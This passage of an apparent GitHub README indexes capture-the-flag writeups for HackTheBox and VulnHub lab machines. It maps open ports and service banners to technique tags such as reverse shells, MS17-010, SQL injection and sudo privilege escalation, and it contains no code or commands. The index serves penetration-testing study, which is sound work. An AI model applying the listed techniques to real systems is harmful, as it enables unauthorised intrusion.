/><br />`http/Apache httpd`<br /><br />`http/Apache httpd 2.0.52 ((CentOS))`<br /><br />`http/Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)`<br /><br />`http/Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)`<br /><br />`http/Apache httpd 2.2.22 ((Ubuntu))`<br /><br />`http/Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)`<br /><br />`http/Apache httpd 2.4.18 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.25 ((Debian))`<br /><br />`http/Apache httpd 2.4.29`<br /><br />`http/Apache httpd 2.4.29 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.34 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.41 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.7 ((Ubuntu))`<br /><br />`http/HttpFileServer httpd 2.3`<br /><br />`http/Microsoft IIS httpd 6.0`<br /><br />`http/Microsoft IIS httpd 7.5` | [`enumerate_app_apache`](https://github.com/7h3rAm/writeups#enumerate_app_apache), [`enumerate_app_apache_tomcat`](https://github.com/7h3rAm/writeups#enumerate_app_apache_tomcat), [`enumerate_app_coldfusion_files`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_files), [`enumerate_app_coldfusion_version`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_version), [`enumerate_app_drupal`](https://github.com/7h3rAm/writeups#enumerate_app_drupal), [`enumerate_app_joomla`](https://github.com/7h3rAm/writeups#enumerate_app_joomla), [`enumerate_app_phpmyadmin`](https://github.com/7h3rAm/writeups#enumerate_app_phpmyadmin), [`enumerate_app_prtg`](https://github.com/7h3rAm/writeups#enumerate_app_prtg), [`enumerate_app_webmin`](https://github.com/7h3rAm/writeups#enumerate_app_webmin), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_proto_webdav`](https://github.com/7h3rAm/writeups#enumerate_proto_webdav) | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | | 8. | `111/tcp` | | [`enumerate_proto_nfs`](https://github.com/7h3rAm/writeups#enumerate_proto_nfs), [`enumerate_proto_rpc`](https://github.com/7h3rAm/writeups#enumerate_proto_rpc) | | | 9. | `135/tcp` | | [`enumerate_proto_rpc`](https://github.com/7h3rAm/writeups#enumerate_proto_rpc) | | | 10. | `139/tcp` | `netbios-ssn/Microsoft Windows netbios-ssn`<br /><br />`netbios-ssn/Samba smbd 3.X - 4.X (workgroup: WORKGROUP)` | [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067), [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067), [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root) | | 11. | `161/tcp` | | [`enumerate_proto_snmp`](https://github.com/7h3rAm/writeups#enumerate_proto_snmp) | | | 12. | `389/tcp` | | [`enumerate_proto_ldap`](https://github.com/7h3rAm/writeups#enumerate_proto_ldap) | | | 13. | `443/tcp` | `ssl/https/Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b` | [`enumerate_app_apache`](https://github.com/7h3rAm/writeups#enumerate_app_apache), [`enumerate_app_apache_tomcat`](https://github.com/7h3rAm/writeups#enumerate_app_apache_tomcat), [`enumerate_app_coldfusion_files`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_files), [`enumerate_app_coldfusion_version`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_version), [`enumerate_app_drupal`](https://github.com/7h3rAm/writeups#enumerate_app_drupal), [`enumerate_app_joomla`](https://github.com/7h3rAm/writeups#enumerate_app_joomla), [`enumerate_app_phpmyadmin`](https://github.com/7h3rAm/writeups#enumerate_app_phpmyadmin), [`enumerate_app_prtg`](https://github.com/7h3rAm/writeups#enumerate_app_prtg), [`enumerate_app_webmin`](https://github.com/7h3rAm/writeups#enumerate_app_webmin), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_proto_webdav`](https://github.com/7h3rAm/writeups#enumerate_proto_webdav) | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | | 14. | `445/tcp` | `microsoft-ds/Windows Server 2019 Standard 17763 microsoft-ds` | [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067), [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | | 15. | `636/tcp` | | [`enumerate_proto_ldap`](https://github.com/7h3rAm/writeups#enumerate_proto_ldap) | | | 16. | `1337/tcp` | `http/Apache httpd 2.4.7 ((Ubuntu))` | | [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 17. | `1433/tcp` | `ms-sql-s/Microsoft SQL Server 14.00.1000.00` | [`enumerate_proto_mssql`](https://github.com/7h3rAm/writeups#enumerate_proto_mssql), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig) | [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell) | | 18. | `1521/tcp` | | [`enumerate_proto_oracle`](https://github.com/7h3rAm/writeups#enumerate_proto_oracle), [`enumerate_proto_postgres`](https://github.com/7h3rAm/writeups#enumerate_proto_postgres) | | | 19. | `1974/tcp` | | | [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 20. | `2049/tcp` | `nfs_acl/2-3 (RPC #100227)`<br /><br />`nfs_acl/3 (RPC #100227)` | [`enumerate_proto_nfs`](https://github.com/7h3rAm/writeups#enumerate_proto_nfs) | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid) | | 21. | `3000/tcp` | `http/Node.js Express framework` | | [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 22. | `3232/tcp` | | [`enumerate_proto_distcc`](https://github.com/7h3rAm/writeups#enumerate_proto_distcc) | | | 23. | `3306/tcp` | | [`enumerate_proto_mysql`](https://github.com/7h3rAm/writeups#enumerate_proto_mysql) | | | 24. | `6660/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 25. | `6661/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 26. | `6662/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 27. | `6663/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 28. | `6664/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 29. | `6665/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 30. | `6666/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 31. | `6667/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 32. | `6668/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 33. | `6669/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 34. | `7000/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 35. | `8080/tcp` | `http/Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)`<br /><br />`http/Apache httpd 2.4.29 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)` | [`enumerate_app_apache`](https://github.com/7h3rAm/writeups#enumerate_app_apache), [`enumerate_app_apache_tomcat`](https://github.com/7h3rAm/writeups#enumerate_app_apache_tomcat), [`enumerate_app_coldfusion_files`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_files), [`enumerate_app_coldfusion_version`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_version), [`enumerate_app_drupal`](https://github.com/7h3rAm/writeups#enumerate_app_drupal), [`enumerate_app_joomla`](https://github.com/7h3rAm/writeups#enumerate_app_joomla), [`enumerate_app_phpmyadmin`](https://github.com/7h3rAm/writeups#enumerate_app_phpmyadmin), [`enumerate_app_prtg`](https://github.com/7h3rAm/writeups#enumerate_app_prtg), [`enumerate_app_webmin`](https://github.com/7h3rAm/writeups#enumerate_app_webmin), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_proto_rdp`](https://github.com/7h3rAm/writeups#enumerate_proto_rdp), [`enumerate_proto_webdav`](https://github.com/7h3rAm/writeups#enumerate_proto_webdav) | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 36. | `9999/tcp` | `abyss?` | | [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 37. | `10000/tcp` | `http/SimpleHTTPServer 0.6 (Python 2.7.3)` | | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof) | | 38. | `27017/tcp` | | [`enumerate_app_mongo`](https://github.com/7h3rAm/writeups#enumerate_app_mongo) | | | 39. | `28017/tcp` | | [`enumerate_app_mongo`](https://github.com/7h3rAm/writeups#enumerate_app_mongo) | | <a name="machines"></a> ## 💥 Machines [↟](#contents) | # | Name | Infra | Killchain | TTPs | |:---:|:--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:|:---------------------------------------------------------------------------:|:--------------------------------------------------------------------------------------------------------------------------------------:|:-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#archetype](https://www.hackthebox.eu/home/start) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100"/> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | | 2. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/ratings.png" width="59" height="20"/> | [htb#118](https://www.hackthebox.eu/home/machines/profile/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 3. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100"/> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 4. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/ratings.png" width="59" height="20"/> | [htb#48](https://www.hackthebox.eu/home/machines/profile/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 5. | [Blue](https://github.com/7h3rAm/writeups/blob/master/htb.blue/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/ratings.png" width="59" height="20"/> | [htb#51](https://www.hackthebox.eu/home/machines/profile/51) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/killchain.png" width="100" height="100"/> | [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | | 6. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100"/> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 7. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100"/> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 8. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/ratings.png" width="59" height="20"/> | [htb#263](https://www.hackthebox.eu/home/machines/profile/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | | 9. | [Cronos](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/ratings.png" width="59" height="20"/> | [htb#11](https://www.hackthebox.eu/home/machines/profile/11) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron) | | 10. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 11. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/ratings.png" width="59" height="20"/> | [htb#3](https://www.hackthebox.eu/home/machines/profile/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100"/> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | | 12. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100"/> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 13. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 14. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/ratings.png" width="59" height="20"/> | [htb#13](https://www.hackthebox.eu/home/machines/profile/13) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png" width="100" height="100"/> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070) | | 15. | [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/ratings.png" width="59" height="20"/> | [htb#14](https://www.hackthebox.eu/home/machines/profile/14) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png" width="100" height="100"/> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051) | | 16. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 17. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 18. | [HackLAB: 